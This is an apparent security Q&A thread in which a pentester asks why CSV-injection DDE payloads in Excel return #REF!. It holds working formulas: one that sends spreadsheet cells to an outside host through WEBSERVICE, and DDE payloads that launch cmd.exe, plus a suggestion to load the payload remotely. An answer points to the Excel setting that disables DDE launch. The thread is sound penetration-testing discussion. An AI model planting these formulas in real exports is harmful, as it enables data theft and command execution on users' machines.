9

I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as:

=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50))

I am now trying to create a "more dangerous" payload and I see a lot of reference online using something such as:

=cmd|' /C calc'!A0

However, I can't find a way to have such a payload trigger, I always get a #REF! error. Is this kind of attack still feasible in 2020 ? Or did Microsoft implement a mitigation for those attacks?

I'm running Excel for Office 365 version 1902.

Scaum
  • 271
  • 2
  • 7

2 Answers2

7

Finally found the reason why the payload were not executing: DDE launch was disabled in Excel options.

If someone has the same issue, this setting can be found in

File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch

Reference https://docs.microsoft.com/en-us/office365/troubleshoot/security/security-settings

schroeder
  • 123,438
  • 55
  • 284
  • 319
Scaum
  • 271
  • 2
  • 7
0

I haven't tested this, but it might be possible to get this to run using the WEBSERVICE function. According to microsoft you can update cells with the function, then combining with this mimecast article it appears you could load your malicious "cell-code" using this function.

It would look something like this:

=WEBSERVICE("http://example.com/payload.txt")

Where payload.txt contains:

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''

Payload courtesy of PentestLab Blog, so not sure if it still executes the same way.

Blaise Brignac
  • 1
  • Hi Blaise, thanks for your answer, I understand the concerpt of loading the payload using WEBSERVICE function, my issue is more about creating the payload. If I paste the code from PentestLab in my Excel, I only get a #REF! error and no code execution :( – Scaum Feb 14 '20 at 14:05